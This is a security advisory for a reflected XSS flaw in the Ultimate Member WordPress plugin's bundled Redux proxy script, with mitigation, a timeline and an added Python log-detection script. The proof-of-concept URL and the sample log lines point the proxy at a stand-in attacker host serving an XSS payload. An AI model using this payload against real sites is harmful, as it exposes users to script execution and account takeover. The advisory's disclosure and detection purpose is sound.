Ultimate Member 1.2.98-1.2.997, Reflected XSS

The Ultimate Member plugin uses the Redux Framework. The Redux Framework includes a script named ‘class.p.php’ that acts as an HTTP proxy. Using this script, it is possible to trigger a reflected XSS attack by loading data from a location controlled by the attacker. The data from that location is then output on the target domain, so any JavaScript it contains executes in the context of the current user of the site.

Homepage

https://wordpress.org/plugins/ultimate-member/

CVSS Score

5.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 1.3.0

Proof of Concept

If a user of the target site can be tricked into visiting the following URL (the page specified in the ‘url’ parameter would contain your XSS payload), then the HTML/JS within the target page will be executed under the context of the current user.

http://localhost/wp-admin/admin-ajax.php?action=redux_p&url=http://evilsite.com/xss-payload.html
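For defenders reviewing web server logs for this issue, the following is an added detection example (not part of the advisory) that flags requests reaching the Redux proxy action with a ‘url’ parameter pointing at a host outside a trusted list. It assumes Apache/nginx combined log format; the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jun/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=redux_p&url=http://evilsite.com/xss-payload.html HTTP/1.1" 200 512
203.0.113.9 - - [18/Jun/2015:10:01:05 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 17
203.0.113.7 - - [18/Jun/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=redux_p&url=http%3A%2F%2Flocalhost%2Fwp-content%2Fthemes%2Fx%2Fstyle.css HTTP/1.1" 200 88
203.0.113.8 - - [18/Jun/2015:10:03:00 +0000] "GET /index.php?p=1 HTTP/1.1" 200 1024
"""

# Client IP and request target from a combined-log-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_redux_proxy_requests(log_text, trusted_hosts=("localhost",)):
    """Return (client_ip, proxied_url) for every request that hits
    admin-ajax.php with action=redux_p and a 'url' whose host is not
    in trusted_hosts (i.e. the proxy is being pointed off-site)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parsed = urlparse(target)
        if not parsed.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parsed.query)  # parse_qs percent-decodes values
        if qs.get("action", [None])[0] != "redux_p":
            continue
        for proxied in qs.get("url", []):
            host = (urlparse(proxied).hostname or "").lower()
            if host not in trusted_hosts:
                hits.append((client, proxied))
    return hits


if __name__ == "__main__":
    for client, proxied in flag_redux_proxy_requests(SAMPLE_LOG):
        print(f"ALERT redux_p proxy to off-site URL from {client}: {proxied}")
```

Tune trusted_hosts to the site's own hostnames; a request whose ‘url’ resolves to any other host is worth investigating even after upgrading to 1.3.0.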

Timeline

  • 2015-05-18: Discovered
  • 2015-05-18: Vendor notified
  • 2015-05-18: Vendor responded
  • 2015-06-11: Version 1.2.996 released – issue resolved
  • 2015-06-18: Advisory released
  • 2015-06-22: Notified that issue has in fact not been resolved – Vendor notified
  • 2015-07-07: Version 1.3.0 released – issue resolved (Redux framework updated)